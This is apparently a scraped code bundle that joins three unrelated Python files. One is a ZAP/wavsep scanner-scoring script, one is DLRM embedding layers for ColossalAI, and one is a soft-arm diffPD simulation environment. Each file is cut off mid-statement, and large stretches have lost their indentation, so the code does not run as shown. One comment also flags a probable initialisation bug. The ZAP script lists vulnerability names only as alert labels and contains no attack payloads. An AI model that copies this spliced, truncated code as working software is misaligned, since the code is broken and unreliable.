# Zed Attack Proxy (ZAP) and its related class files.
#
# ZAP is an HTTP/HTTPS proxy for assessing web application security.
#
# Copyright 2012 ZAP Development Team
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# This script tests ZAP against wavsep: http://code.google.com/p/wavsep/
# Note wavsep has to be installed somewhere - the above link is to the
# project not the test suite!
#
# To use this script:
# * Install the ZAP Python API:
# Use 'pip install python-owasp-zap-v2' or
# download from https://github.com/zaproxy/zaproxy/wiki/Downloads
# * Start ZAP (as this is for testing purposes you might not want the
# 'standard' ZAP to be started)
# * Access wavsep via your browser, proxying through ZAP
# * Visit all of the wavsep top-level URLs, e.g.
# http://localhost:8080/wavsep/index-active.jsp
# http://localhost:8080/wavsep/index-passive.jsp
# * Run the Spider against http://localhost:8080
# * Run the Active Scanner against http://localhost:8080/wavsep
# * Run this script
# * Open the report.html file generated in your browser
#
# Notes:
# This has been tested against wavsep 1.5
from zapv2 import ZAPv2
import datetime, sys, getopt
def main(argv):
# -------------------------------------------------------------------------
# Default Configurations - use -h and -p for different host and port
# -------------------------------------------------------------------------
zapHost = '127.0.0.1'
zapPort = '8090'
try:
opts, args = getopt.getopt(argv,"h:p:")
except getopt.GetoptError:
print 'wavsep.py -h <ZAPhost> -p <ZAPport>'
sys.exit(2)
for opt, arg in opts:
if opt == '-h':
zapHost = arg
elif opt == '-p':
zapPort = arg
zapUrl = 'http://' + zapHost + ':' + zapPort
# Dictionary of abbreviation to keep the output a bit shorter
abbrev = {
'Active Vulnerability title' : 'Ex',\
'Cross Site Scripting (DOM Based)' : 'DXSS',\
'Cross Site Scripting (Reflected)' : 'RXSS',\
'Absence of Anti-CSRF Tokens' : 'NoCSRF',\
'Application Error Disclosure' : 'AppError',\
'Anti CSRF Tokens Scanner' : 'ACSRF',\
'Buffer Overflow' : 'Buffer',\
'Cookie set without HttpOnly flag' : 'HttpOnly',\
'Cookie Slack Detector' : 'CookieSlack',\
'Cross Site Request Forgery' : 'CSRF',\
'External Redirect' : 'ExtRedir',\
'Format String Error' : 'Format',\
'HTTP Parameter Override' : 'ParamOver',\
'Information disclosure - database error messages' : 'InfoDb',\
'Information disclosure - debug error messages' : 'InfoDebug',\
'Information Disclosure - Sensitive Informations in URL' : 'InfoUrl',\
'LDAP Injection' : 'LDAP',\
'Loosely Scoped Cookie' : 'CookieLoose',\
'None. Warning only.' : 'NoCSRF2',\
'Password Autocomplete in browser' : 'Auto',\
'Path Traversal' : 'PathTrav',\
'Private IP Disclosure' : 'PrivIP',\
'Remote File Inclusion' : 'RFI',\
'Session ID in URL Rewrite' : 'SessRewrite',\
'Source Code Disclosure - File Inclusion' : 'SrcInc',\
'SQL Injection' : 'SQLi',\
'SQL Injection - MySQL' : 'SqlMySql',\
'SQL Injection - Generic SQL RDBMS' : 'SqlGen',\
'SQL Injection - Boolean Based' : 'SqlBool',\
'SQL Injection - Error Based - Generic SQL RDBMS' : 'SqlGenE',\
'SQL Injection - Error Based - MySQL' : 'SqlMySqlE',\
'SQL Injection - Error Based - Java' : 'SqlJavaE',\
'SQL Injection - Hypersonic SQL - Time Based' : 'SqlHyperT',\
'SQL Injection - MySQL - Time Based' : 'SqlMySqlT',\
'SQL Injection - Oracle - Time Based' : 'SqlOracleT',\
'SQL Injection - PostgreSQL - Time Based' : 'SqlPostgreT',\
'URL Redirector Abuse' : 'UrlRedir',\
'Viewstate without MAC signature (Unsure)' : 'ViewstateNoMac',\
'Weak Authentication Method' : 'WeakAuth',\
'Web Browser XSS Protection Not Enabled' : 'XSSoff',\
'X-Content-Type-Options Header Missing' : 'XContent',\
'X-Frame-Options Header Not Set' : 'XFrame'}
# The rules to apply:
# Column 1: String to match against an alert URL
# Column 2: Alert abbreviation to match
# Column 3: pass, fail, ignore
#
rules = [ \
# All these appear to be valid ;)
['-', 'InfoDebug', 'ignore'], \
['-', 'InfoUrl', 'ignore'], \
['-', 'ACSRF', 'ignore'], \
['-', 'ACSRF', 'ignore'], \
['-', 'Ex', 'ignore'], \
['-', 'CookieLoose', 'ignore'], \
['-', 'CookieSlack', 'ignore'], \
['-', 'NoCSRF2', 'ignore'], \
['-', 'ParamOver', 'ignore'], \
['-', 'PrivIP', 'ignore'], \
['-', 'SrcInc', 'ignore'], \
['-', 'XFrame', 'ignore'], \
['-', 'XContent', 'ignore'], \
['-', 'XSSoff', 'ignore'], \
['LFI-', 'AppError', 'ignore'], \
['LFI-', 'Buffer', 'ignore'], \
['LFI-', 'Format', 'ignore'], \
['LFI-', 'NoCSRF', 'ignore'], \
['LFI-', 'RFI', 'ignore'], \
['LFI-', 'DXSS', 'ignore'], \
['LFI-', 'RXSS', 'ignore'], \
['LFI-', 'SqlHyperT', 'ignore'], \
['LFI-', 'SqlMySql', 'ignore'], \
['LFI-', 'SqlOracleT', 'ignore'], \
['LFI-', 'SqlPostgreT', 'ignore'], \
['Redirect-', 'LDAP', 'ignore'], \
['Redirect-', 'NoCSRF', 'ignore'], \
['Redirect-', 'RFI', 'ignore'], \
['Redirect-', 'DXSS', 'ignore'], \
['Redirect-', 'RXSS', 'ignore'], \
['Redirect-', 'SqlHyperT', 'ignore'], \
['Redirect-', 'SqlMySql', 'ignore'], \
['Redirect-', 'SqlOracleT', 'ignore'], \
['Redirect-', 'SqlPostgreT', 'ignore'], \
['RFI-', 'AppError', 'ignore'], \
['RFI-', 'Buffer', 'ignore'], \
['RFI-', 'Format', 'ignore'], \
['RFI-', 'NoCSRF', 'ignore'], \
['RFI-', 'DXSS', 'ignore'], \
['RFI-', 'RXSS', 'ignore'], \
['RFI-', 'SqlHyperT', 'ignore'], \
['RFI-', 'SqlMySql', 'ignore'], \
['RFI-', 'SqlOracleT', 'ignore'], \
['RFI-', 'SqlPostgreT', 'ignore'], \
['RXSS-', 'Auto', 'ignore'], \
['RXSS-', 'Buffer', 'ignore'], \
['RXSS-', 'Format', 'ignore'], \
['RXSS-', 'HttpOnly', 'ignore'], \
['RXSS-', 'NoCSRF', 'ignore'], \
['RXSS-', 'SqlOracleT', 'ignore'], \
['RXSS-', 'SqlPostgreT', 'ignore'], \
['RXSS-', 'SqlMySql', 'ignore'], \
['RXSS-', 'SqlOracleT', 'ignore'], \
['RXSS-', 'ViewstateNoMac', 'ignore'], \
['SInjection-', 'AppError', 'ignore'], \
['SInjection-', 'Auto', 'ignore'], \
['SInjection-', 'Buffer', 'ignore'], \
['SInjection-', 'NoCSRF', 'ignore'], \
['SInjection-', 'Format', 'ignore'], \
['SInjection-', 'LDAP', 'ignore'], \
['SInjection-', 'RXSS', 'ignore'], \
['SInjection-', 'SqlHyperT', 'ignore'], \
['LoginBypass', 'Auto', 'ignore'], \
['CrlfRemovalInHttpHeader', 'HttpOnly', 'ignore'], \
['Tag2HtmlPageScopeValidViewstateRequired', 'ViewstateNoMac', 'ignore'], \
['session-password-autocomplete', 'NoCSRF', 'ignore'], \
#
['LFI-Detection-Evaluation', 'PathTrav', 'pass'], \
['LFI-FalsePositives', 'PathTrav', 'fail'], \
['Redirect-', 'ExtRedir', 'pass'], \
['RFI-Detection-Evaluation', 'RFI', 'pass'], \
['RFI-FalsePositives', 'RFI', 'fail'], \
['RXSS-Detection-Evaluation', 'DXSS', 'pass'], \
['RXSS-Detection-Evaluation', 'RXSS', 'pass'], \
['RXSS-FalsePositives-GET', 'DXSS', 'fail'], \
['RXSS-FalsePositives-GET', 'RXSS', 'fail'], \
['SInjection-Detection-Evaluation', 'SQLfp', 'pass'], \
['SInjection-Detection-Evaluation', 'SQLi', 'pass'], \
#['SInjection-Detection-Evaluation', 'SqlHyper', 'pass'], \
['SInjection-Detection-Evaluation', 'SqlBool', 'pass'], \
['SInjection-Detection-Evaluation', 'SqlGen', 'pass'], \
['SInjection-Detection-Evaluation', 'SqlGenE', 'pass'], \
['SInjection-Detection-Evaluation', 'SqlMySql', 'pass'], \
['SInjection-Detection-Evaluation', 'SqlMySqlE', 'pass'], \
['SInjection-Detection-Evaluation', 'SqlMySqlT', 'pass'], \
['SInjection-Detection-Evaluation', 'SqlOracleT', 'pass'], \
['SInjection-Detection-Evaluation', 'SqlPostgreT', 'pass'], \
['SInjection-FalsePositives', 'SQLfp', 'fail'], \
['SInjection-FalsePositives', 'SQLi', 'fail'], \
['SInjection-FalsePositives', 'SqlBool', 'fail'], \
['SInjection-FalsePositives', 'SqlGen', 'fail'], \
['SInjection-FalsePositives', 'SqlGenE', 'fail'], \
['SInjection-FalsePositives', 'SqlMySql', 'fail'], \
['SInjection-FalsePositives', 'SqlMySqlE', 'fail'], \
['SInjection-FalsePositives', 'SqlMySqlT', 'fail'], \
['SInjection-FalsePositives', 'SqlHyperT', 'fail'], \
['SInjection-FalsePositives', 'SqlMySqlT', 'fail'], \
['SInjection-FalsePositives', 'SqlOracleT', 'fail'], \
['SInjection-FalsePositives', 'SqlPostgreT', 'fail'], \
['info-cookie-no-httponly', 'HttpOnly', 'pass'], \
['info-server-stack-trace', 'AppError', 'pass'], \
['session-password-autocomplete', 'Auto', 'pass'], \
['weak-authentication-basic', 'WeakAuth', 'pass'], \
]
zap = ZAPv2(proxies={'http': zapUrl, 'https': zapUrl})
uniqueUrls = set([])
	# alertsPerUrl is a dictionary of urlsummary to a dictionary of type to set of alert short names ;)
alertsPerUrl = {}
plugins = set([])
alertPassCount = {}
alertFailCount = {}
alertIgnoreCount = {}
alertOtherCount = {}
zapVersion = zap.core.version
totalAlerts = 0
offset = 0
page = 100
# Page through the alerts as otherwise ZAP can hang...
alerts = zap.core.alerts('', offset, page)
while len(alerts) > 0:
totalAlerts += len(alerts)
for alert in alerts:
url = alert.get('url')
# Grab the url before any '?'
url = url.split('?')[0]
#print 'URL: ' + url
urlEl = url.split('/')
if (len(urlEl) > 6):
#print 'URL 4:' + urlEl[4] + ' 6:' + urlEl[6].split('-')[0]
if (urlEl[3] != 'wavsep'):
print 'Ignoring non wavsep URL 4:' + urlEl[4] + ' URL 5:' + urlEl[5] + ' URL 6:' + urlEl[6]
continue
if (urlEl[6].split('-')[0][:9] == 'index.jsp'):
#print 'Ignoring index URL 4:' + urlEl[4] + ' URL 5:' + urlEl[5] + ' URL 6:' + urlEl[6]
continue
if (len(urlEl) > 7 and urlEl[4] == 'active'):
if (urlEl[7].split('-')[0][:4] != 'Case'):
#print 'Ignoring index URL 4:' + urlEl[4] + ' URL 5:' + urlEl[5] + ' URL 6:' + urlEl[6] + ' URL 7:' + urlEl[7]
continue
urlSummary = urlEl[4] + ' : ' + urlEl[5] + ' : ' + urlEl[6] + ' : ' + urlEl[7].split('-')[0]
else:
# Passive URLs have different format
urlSummary = urlEl[4] + ' : ' + urlEl[5] + ' : ' + urlEl[6]
#print 'URL summary:' + urlSummary
short = abbrev.get(alert.get('alert'))
if (short is None):
short = 'UNKNOWN'
print 'Unknown alert: ' + alert.get('alert')
aDict = alertsPerUrl.get(urlSummary, {'pass' : set([]), 'fail' : set([]), 'ignore' : set([]), 'other' : set([])})
added = False
for rule in rules:
if (rule[0] in urlSummary and rule[1] == short):
aDict[rule[2]].add(short)
# Counts per alert
if (rule[2] == 'pass'):
alertPassCount[short] = alertPassCount.get(short, 0) + 1
elif (rule[2] == 'fail'):
alertFailCount[short] = alertFailCount.get(short, 0) + 1
elif (rule[2] == 'ignore'):
alertIgnoreCount[short] = alertIgnoreCount.get(short, 0) + 1
added = True
break
if (not added):
aDict['other'].add(short)
alertOtherCount[short] = alertOtherCount.get(short, 0) + 1
alertsPerUrl[urlSummary] = aDict
plugins.add(alert.get('alert'))
uniqueUrls.add(url)
offset += page
alerts = zap.core.alerts('', offset, page)
#for key, value in alertsPerUrl.iteritems():
#	print key, value
# Generate report file
# Writes a static HTML report; Google's jsapi is loaded for charting further down.
reportFile = open('report.html', 'w')
reportFile.write("<html>\n")
reportFile.write(" <head>\n")
reportFile.write(" <title>ZAP Wavsep Report</title>\n")
reportFile.write(" <!--Load the AJAX API-->\n")
reportFile.write(" <script type=\"text/javascript\" src=\"https://www.google.com/jsapi\"></script>\n")
reportFile.write(" </head>\n")
reportFile.write("<body>\n")
reportFile.write("<h1><img src=\"https://raw.githubusercontent.com/zaproxy/zaproxy/develop/src/resource/zap64x64.png\" align=\"middle\">OWASP ZAP wavsep results</h1>\n")
reportFile.write("Generated: " + datetime.datetime.now().strftime("%Y-%m-%d %H:%M") + "\n")
# Accumulators: each entry is [label, pass_count, fail_count].
topResults = []
thisTop = ['', 0, 0]
groupResults = []
thisGroup = ['', 0, 0]
totalPass = 0
totalFail = 0
# Calculate the top level scores
# Relies on sorted() grouping keys so that all rows of one 'top' category are adjacent.
for key, value in sorted(alertsPerUrl.iteritems()):
    top = key.split(' : ')[1]
    if ('-' in top):
        # Collapse e.g. 'LFI-Detection-Evaluation' down to its first two segments.
        top = top.split('-')[0] + '-' + top.split('-')[1]
    if (top != thisTop[0]):
        thisTop = [top, 0, 0] # top, pass, fail
        topResults.append(thisTop)
    # A URL counts as a pass if any rule classified an alert there as 'pass';
    # FalsePositive pages with no alerts at all also count as a pass.
    if (len(value.get('pass')) > 0):
        thisTop[1] += 1
    elif (len(value.get('fail')) > 0):
        thisTop[2] += 1
    elif ('FalsePositive' in key):
        thisTop[1] += 1
    else:
        thisTop[2] += 1
# Calculate the group scores
for key, value in sorted(alertsPerUrl.iteritems()):
group = key.split(' : ')[1]
if (group != thisGroup[0]):
thisGroup = [group, 0, 0] # group, pass, fail
groupResults.append(thisGroup)
if (len(value.get('pass')) > 0):
totalPass += | |
<gh_stars>0
from __future__ import absolute_import, division, print_function, unicode_literals
# For distributed run
import extend_distributed as ext_dist
# numpy
import numpy as np
import sys
# pytorch
import torch
from torch._ops import ops
from torch.autograd.profiler import record_function
from torch.nn.parallel.parallel_apply import parallel_apply
from torch.nn.parallel.replicate import replicate
from torch.nn.parallel.scatter_gather import gather, scatter
from torch.nn.parameter import Parameter
import torch.nn as nn
import torch.nn.functional as F
import colossalai
def md_solver(n, alpha, d0=None, B=None, round_dim=True, k=None):
    '''
    An external facing function call for mixed-dimension assignment
    with the alpha power temperature heuristic
    Inputs:
    n -- (torch.LongTensor) ; Vector of num of rows for each embedding matrix
    alpha -- (torch.FloatTensor); Scalar, non-negative, controls dim. skew
    d0 -- (torch.FloatTensor); Scalar, baseline embedding dimension
    B -- (torch.FloatTensor); Scalar, parameter budget for embedding layer
    round_dim -- (bool); flag for rounding dims to nearest pow of 2
    k -- (torch.LongTensor) ; Vector of average number of queries per inference
    '''
    # Work on the tables in ascending-row-count order; remember the permutation.
    sorted_n, order = torch.sort(n)
    # Popularity weighting: divide row counts by avg queries per inference when given.
    queries = k[order] if k is not None else torch.ones(len(sorted_n))
    dims = alpha_power_rule(sorted_n.type(torch.float) / queries, alpha, d0=d0, B=B)
    if round_dim:
        dims = pow_2_round(dims)
    # Invert the sort permutation so dims line up with the caller's table order.
    return dims[torch.argsort(order)]
def alpha_power_rule(n, alpha, d0=None, B=None):
    """Assign each table a dimension d_i = lamb * n_i^(-alpha).

    The scale lamb is anchored either so the smallest table gets dimension
    ``d0``, or so the total parameter count meets budget ``B``. Dimensions
    are floored at 1 and returned rounded to long integers.

    Raises:
        ValueError: if neither ``d0`` nor ``B`` is provided.
    """
    counts = n.type(torch.float)
    if d0 is not None:
        lamb = d0 * (counts[0] ** alpha)
    elif B is not None:
        lamb = B / torch.sum(counts ** (1 - alpha))
    else:
        raise ValueError("Must specify either d0 or B")
    dims = torch.ones(len(n)) * lamb * (counts ** (-alpha))
    # Floor every dimension at 1; when d0 is given, the first (smallest-n)
    # table is pinned exactly to d0, matching the anchoring above.
    dims = torch.clamp(dims, min=1)
    if d0 is not None:
        dims[0] = d0
    return torch.round(dims).type(torch.long)
def pow_2_round(dims):
    """Round each entry of *dims* to the nearest power of two (nearest in log2 space)."""
    exponents = torch.round(torch.log2(dims.type(torch.float)))
    return 2 ** exponents
class PrEmbeddingBag(nn.Module):
    """Sum-pooled EmbeddingBag whose output is projected up to a common base dim.

    When ``embedding_dim < base_dim`` a bias-free linear layer lifts the pooled
    vector to ``base_dim``; when equal, the projection is the identity; a larger
    ``embedding_dim`` is rejected.
    """

    def __init__(self, num_embeddings, embedding_dim, base_dim):
        super(PrEmbeddingBag, self).__init__()
        self.embs = nn.EmbeddingBag(
            num_embeddings, embedding_dim, mode="sum", sparse=True)
        torch.nn.init.xavier_uniform_(self.embs.weight)
        if embedding_dim > base_dim:
            raise ValueError(
                "Embedding dim " + str(embedding_dim) + " > base dim " + str(base_dim)
            )
        if embedding_dim == base_dim:
            self.proj = nn.Identity()
        else:
            # Lift the pooled embedding up to the shared base dimension.
            self.proj = nn.Linear(embedding_dim, base_dim, bias=False)
            torch.nn.init.xavier_uniform_(self.proj.weight)

    def forward(self, input, offsets=None, per_sample_weights=None):
        pooled = self.embs(
            input, offsets=offsets, per_sample_weights=per_sample_weights)
        return self.proj(pooled)
class QREmbeddingBag(nn.Module):
    r"""Computes sums or means over two 'bags' of embeddings, one using the quotient
    of the indices and the other using the remainder of the indices, without
    instantiating the intermediate embeddings, then performs an operation to combine these.
    For bags of constant length and no :attr:`per_sample_weights`, this class
        * with ``mode="sum"`` is equivalent to :class:`~torch.nn.Embedding` followed by ``torch.sum(dim=0)``,
        * with ``mode="mean"`` is equivalent to :class:`~torch.nn.Embedding` followed by ``torch.mean(dim=0)``,
        * with ``mode="max"`` is equivalent to :class:`~torch.nn.Embedding` followed by ``torch.max(dim=0)``.
    However, :class:`~torch.nn.EmbeddingBag` is much more time and memory efficient than using a chain of these
    operations.
    QREmbeddingBag also supports per-sample weights as an argument to the forward
    pass. This scales the output of the Embedding before performing a weighted
    reduction as specified by ``mode``. If :attr:`per_sample_weights` is passed, the
    only supported ``mode`` is ``"sum"``, which computes a weighted sum according to
    :attr:`per_sample_weights`.
    Known Issues:
    Autograd breaks with multiple GPUs. It breaks only with multiple embeddings.
    Args:
        num_categories (int): total number of unique categories. The input indices must be in
                              0, 1, ..., num_categories - 1.
        embedding_dim (list): list of sizes for each embedding vector in each table. If ``"add"``
                              or ``"mult"`` operation are used, these embedding dimensions must be
                              the same. If a single embedding_dim is used, then it will use this
                              embedding_dim for both embedding tables.
        num_collisions (int): number of collisions to enforce.
        operation (string, optional): ``"concat"``, ``"add"``, or ``"mult"``. Specifies the operation
                                      to compose embeddings. ``"concat"`` concatenates the embeddings,
                                      ``"add"`` sums the embeddings, and ``"mult"`` multiplies
                                      (component-wise) the embeddings.
                                      Default: ``"mult"``
        max_norm (float, optional): If given, each embedding vector with norm larger than :attr:`max_norm`
                                    is renormalized to have norm :attr:`max_norm`.
        norm_type (float, optional): The p of the p-norm to compute for the :attr:`max_norm` option. Default ``2``.
        scale_grad_by_freq (boolean, optional): if given, this will scale gradients by the inverse of frequency of
                                                the words in the mini-batch. Default ``False``.
                                                Note: this option is not supported when ``mode="max"``.
        mode (string, optional): ``"sum"``, ``"mean"`` or ``"max"``. Specifies the way to reduce the bag.
                                 ``"sum"`` computes the weighted sum, taking :attr:`per_sample_weights`
                                 into consideration. ``"mean"`` computes the average of the values
                                 in the bag, ``"max"`` computes the max value over each bag.
                                 Default: ``"mean"``
        sparse (bool, optional): if ``True``, gradient w.r.t. :attr:`weight` matrix will be a sparse tensor. See
                                 Notes for more details regarding sparse gradients. Note: this option is not
                                 supported when ``mode="max"``.
    Attributes:
        weight (Tensor): the learnable weights of each embedding table is the module of shape
                         `(num_embeddings, embedding_dim)` initialized using a uniform distribution
                         with sqrt(1 / num_categories).
    Inputs: :attr:`input` (LongTensor), :attr:`offsets` (LongTensor, optional), and
        :attr:`per_sample_weights` (Tensor, optional)
        - If :attr:`input` is 2D of shape `(B, N)`,
          it will be treated as ``B`` bags (sequences) each of fixed length ``N``, and
          this will return ``B`` values aggregated in a way depending on the :attr:`mode`.
          :attr:`offsets` is ignored and required to be ``None`` in this case.
        - If :attr:`input` is 1D of shape `(N)`,
          it will be treated as a concatenation of multiple bags (sequences).
          :attr:`offsets` is required to be a 1D tensor containing the
          starting index positions of each bag in :attr:`input`. Therefore,
          for :attr:`offsets` of shape `(B)`, :attr:`input` will be viewed as
          having ``B`` bags. Empty bags (i.e., having 0-length) will have
          returned vectors filled by zeros.
        per_sample_weights (Tensor, optional): a tensor of float / double weights, or None
            to indicate all weights should be taken to be ``1``. If specified, :attr:`per_sample_weights`
            must have exactly the same shape as input and is treated as having the same
            :attr:`offsets`, if those are not ``None``. Only supported for ``mode='sum'``.
    Output shape: `(B, embedding_dim)`
    """
    __constants__ = ['num_categories', 'embedding_dim', 'num_collisions',
                     'operation', 'max_norm', 'norm_type', 'scale_grad_by_freq',
                     'mode', 'sparse']
    def __init__(self, num_categories, embedding_dim, num_collisions,
                 operation='mult', max_norm=None, norm_type=2.,
                 scale_grad_by_freq=False, mode='mean', sparse=False,
                 _weight=None):
        super(QREmbeddingBag, self).__init__()
        assert operation in ['concat', 'mult', 'add'], 'Not valid operation!'
        self.num_categories = num_categories
        # A scalar embedding_dim is duplicated so quotient and remainder
        # tables share the same width.
        if isinstance(embedding_dim, int) or len(embedding_dim) == 1:
            self.embedding_dim = [embedding_dim, embedding_dim]
        else:
            self.embedding_dim = embedding_dim
        self.num_collisions = num_collisions
        self.operation = operation
        self.max_norm = max_norm
        self.norm_type = norm_type
        self.scale_grad_by_freq = scale_grad_by_freq
        # Element-wise combination requires matching widths.
        if self.operation == 'add' or self.operation == 'mult':
            assert self.embedding_dim[0] == self.embedding_dim[1], \
                'Embedding dimensions do not match!'
        # Quotient table covers ceil(num_categories / num_collisions) rows;
        # remainder table covers num_collisions rows.
        self.num_embeddings = [int(np.ceil(num_categories / num_collisions)),
                               num_collisions]
        if _weight is None:
            self.weight_q = Parameter(torch.Tensor(self.num_embeddings[0], self.embedding_dim[0]))
            self.weight_r = Parameter(torch.Tensor(self.num_embeddings[1], self.embedding_dim[1]))
            self.reset_parameters()
        else:
            assert list(_weight[0].shape) == [self.num_embeddings[0], self.embedding_dim[0]], \
                'Shape of weight for quotient table does not match num_embeddings and embedding_dim'
            assert list(_weight[1].shape) == [self.num_embeddings[1], self.embedding_dim[1]], \
                'Shape of weight for remainder table does not match num_embeddings and embedding_dim'
            self.weight_q = Parameter(_weight[0])
            self.weight_r = Parameter(_weight[1])
        self.mode = mode
        self.sparse = sparse
    def reset_parameters(self):
        # NOTE(review): uniform_(w, a) fills in [a, 1), i.e. the single positional
        # argument is the LOWER bound only. The intent was presumably a symmetric
        # range (-sqrt(1/N), sqrt(1/N)) — TODO confirm against the upstream DLRM code.
        nn.init.uniform_(self.weight_q, np.sqrt(1 / self.num_categories))
        nn.init.uniform_(self.weight_r, np.sqrt(1 / self.num_categories))
    def forward(self, input, offsets=None, per_sample_weights=None):
        # Split each index into (quotient, remainder) w.r.t. num_collisions;
        # the pair uniquely identifies the original category.
        input_q = (input / self.num_collisions).long()
        input_r = torch.remainder(input, self.num_collisions).long()
        embed_q = F.embedding_bag(input_q, self.weight_q, offsets, self.max_norm,
                                  self.norm_type, self.scale_grad_by_freq, self.mode,
                                  self.sparse, per_sample_weights)
        embed_r = F.embedding_bag(input_r, self.weight_r, offsets, self.max_norm,
                                  self.norm_type, self.scale_grad_by_freq, self.mode,
                                  self.sparse, per_sample_weights)
        # Combine the two pooled embeddings per the configured operation.
        if self.operation == 'concat':
            embed = torch.cat((embed_q, embed_r), dim=1)
        elif self.operation == 'add':
            embed = embed_q + embed_r
        elif self.operation == 'mult':
            embed = embed_q * embed_r
        return embed
    def extra_repr(self):
        # Mirrors nn.EmbeddingBag's repr, showing only non-default options.
        s = '{num_embeddings}, {embedding_dim}'
        if self.max_norm is not None:
            s += ', max_norm={max_norm}'
        if self.norm_type != 2:
            s += ', norm_type={norm_type}'
        if self.scale_grad_by_freq is not False:
            s += ', scale_grad_by_freq={scale_grad_by_freq}'
        s += ', mode={mode}'
        return s.format(**self.__dict__)
### define dlrm in Colossalai ###
class DLRM_Net(nn.Module):
def create_mlp(self, ln, sigmoid_layer):
# build MLP layer by layer
layers = nn.ModuleList()
for i in range(0, ln.size - 1):
n = ln[i]
m = ln[i + 1]
# construct fully connected operator
LL = colossalai.nn.Linear(int(n), int(m), bias=True)
# initialize the weights
# with torch.no_grad():
# custom Xavier input, output or two-sided fill
mean = 0.0 # std_dev = np.sqrt(variance)
std_dev = np.sqrt(2 / (m + n)) # np.sqrt(1 / m) # np.sqrt(1 / n)
W = np.random.normal(mean, std_dev, size=(m, n)).astype(np.float32)
std_dev = np.sqrt(1 / m) # np.sqrt(2 / (m + 1))
bt = np.random.normal(mean, std_dev, size=m).astype(np.float32)
# approach 1
LL.weight.data = torch.tensor(W, requires_grad=True)
LL.bias.data = | |
<reponame>srl-ethz/diffPD_sim2real
# ------------------------------------------------------------------------------
# AC2 Design Environment
# ------------------------------------------------------------------------------
import sys
sys.path.append('../')
from pathlib import Path
import time
import os
import pickle
from argparse import ArgumentParser
from PIL import Image, ImageDraw, ImageFont
import shutil
import numpy as np
import scipy.optimize
import trimesh
from py_diff_pd.common.common import ndarray, create_folder, print_info,delete_folder
from py_diff_pd.common.project_path import root_path
from py_diff_pd.env.env_base import EnvBase
from py_diff_pd.common.renderer import PbrtRenderer
from py_diff_pd.core.py_diff_pd_core import StdRealVector, HexMesh3d, HexDeformable, TetMesh3d, TetDeformable
from py_diff_pd.common.hex_mesh import generate_hex_mesh, voxelize, hex2obj
from py_diff_pd.common.display import render_hex_mesh, export_gif, export_mp4
from py_diff_pd.common.tet_mesh import tetrahedralize, generate_tet_mesh, read_tetgen_file
from py_diff_pd.common.tet_mesh import get_contact_vertex as get_tet_contact_vertex
from py_diff_pd.common.hex_mesh import get_contact_vertex as get_hex_contact_vertex
class ArmEnv(EnvBase):
    def __init__(self, seed, folder, options):
        """Build the soft-arm simulation environment from an STL scan.

        Loads the arm mesh (tet or hex), rotates/centres it, pins the top
        vertices, locates tracked marker vertices, collects the four chamber
        wall faces for pressure actuation, and registers material energies.

        Args:
            seed (int): RNG seed for the random pseudo-loss gradients.
            folder: output folder passed to EnvBase.
            options (dict): optional keys — 'youngs_modulus', 'poissons_ratio',
                'state_force_parameters', 'refinement', 'material',
                'mesh_type' ('tet' or 'hex'), 'actuator_parameters', 'spp'.
        """
        EnvBase.__init__(self, folder)
        np.random.seed(seed)
        create_folder(folder, exist_ok=True)
        stlFile = "./STL_files/arm180k.stl"
        youngs_modulus = options['youngs_modulus'] if 'youngs_modulus' in options else 1e6
        poissons_ratio = options['poissons_ratio'] if 'poissons_ratio' in options else 0.45
        state_force_parameters = options['state_force_parameters'] if 'state_force_parameters' in options else ndarray([0.0, 0.0, -9.81])
        refinement = options['refinement'] if 'refinement' in options else 1
        material = options['material'] if 'material' in options else 'none'
        mesh_type = options['mesh_type'] if 'mesh_type' in options else 'tet'
        assert mesh_type in ['tet', 'hex'], "Invalid mesh type!"
        actuator_parameters = options['actuator_parameters'] if 'actuator_parameters' in options else ndarray([
            np.log10(2) + 5
        ])
        # Mesh parameters.
        # Lame parameters derived from (E, nu).
        la = youngs_modulus * poissons_ratio / ((1 + poissons_ratio) * (1 - 2 * poissons_ratio))
        mu = youngs_modulus / (2 * (1 + poissons_ratio))
        density = 1.07e3
        ### Create Mesh
        tmp_bin_file_name = '.tmp.bin'
        if mesh_type == 'tet':
            from py_diff_pd.common.tet_mesh import tetrahedralize, generate_tet_mesh, get_boundary_face
            verts, eles = tetrahedralize(stlFile, normalize_input=False,
                options={
                    'minratio': 1.0,
                    #'maxvolume': 1.0
                }
            )
            generate_tet_mesh(verts, eles, tmp_bin_file_name)
            mesh = TetMesh3d()
            deformable = TetDeformable()
        elif mesh_type == 'hex':
            from py_diff_pd.common.hex_mesh import voxelize, generate_hex_mesh, get_boundary_face
            dx = 0.1 / refinement
            origin = ndarray([0., 0., 0.]) # Set the origin in visualization
            # Voxelize by default normalizes the output, input_normalization is the factor to multiply all vertices by to recover original lengths
            voxels, input_normalization = voxelize(stlFile, dx, normalization_factor=True)
            generate_hex_mesh(voxels, dx*input_normalization, origin, tmp_bin_file_name)
            mesh = HexMesh3d()
            deformable = HexDeformable()
        mesh.Initialize(tmp_bin_file_name)
        mesh.Scale(scale_factor=0.001) # Rescale mesh from millimeters to meters
        deformable.Initialize(mesh.vertices(), mesh.elements(), density, material, youngs_modulus, poissons_ratio)
        os.remove(tmp_bin_file_name)
        ### Transformations
        vert_num = mesh.NumOfVertices()
        verts = ndarray([ndarray(mesh.py_vertex(i)) for i in range(vert_num)])
        # Rotate along x by 90 degrees.
        R = ndarray([
            [1, 0, 0],
            [0, 0, -1],
            [0, 1, 0]
        ])
        verts = verts @ R.T
        min_corner = np.min(verts, axis=0)
        max_corner = np.max(verts, axis=0)
        self._obj_center = (max_corner+min_corner)/2
        ## 4 Points we will track on hex mesh
        # Define the position of these points
        self.target_hex =[
            [0,self._obj_center[1],0],
            [2*self._obj_center[0],self._obj_center[1],0],
            [self._obj_center[0],0,0],
            [self._obj_center[0], 2*self._obj_center[1],0]
        ]
        self.target_idx_hex = []
        # Find the points on the mesh
        # (nearest vertex by Euclidean distance to each requested point)
        for point in self.target_hex:
            norm=np.linalg.norm(verts-point, axis=1)
            self.target_idx_hex.append(int(np.argmin(norm)))
        # NOTE(review): this nested def is dead code — it is never called and
        # shadows nothing; the attribute self.target_idx_hex above is what is used.
        def target_idx_hex():
            return self.target_idx_hex
        # Translate XY plane to origin. Height doesn't really matter here
